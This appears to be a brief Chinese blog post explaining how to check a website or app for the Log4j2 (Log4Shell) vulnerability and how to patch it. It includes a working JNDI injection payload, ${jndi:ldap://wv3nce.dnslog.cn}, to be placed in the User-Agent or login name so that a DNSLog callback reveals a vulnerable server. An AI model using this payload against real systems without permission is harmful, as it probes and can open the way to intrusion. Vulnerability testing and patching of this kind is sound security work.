Log4j2 漏洞
訪問DNSlog網站 獲取一個測試域名 DNSLog Platform
如果有服務器訪問這個測試域名wv3nce.dnslog.cn,DNSlog 網站會留下記錄
在網站或者app端 使用惡意負載 ${jndi:ldap://wv3nce.dnslog.cn}在UA或者用戶名登錄 查看DNSLog,是否有記錄,如果有記錄說明服務器端有漏洞
?
?
修補方法 升級到Log4j-2.15.0-rc2
總結
- 上一篇: 软件工程模块开发卷宗_数据科学家应该了解
- 下一篇: 编程方法学19:接口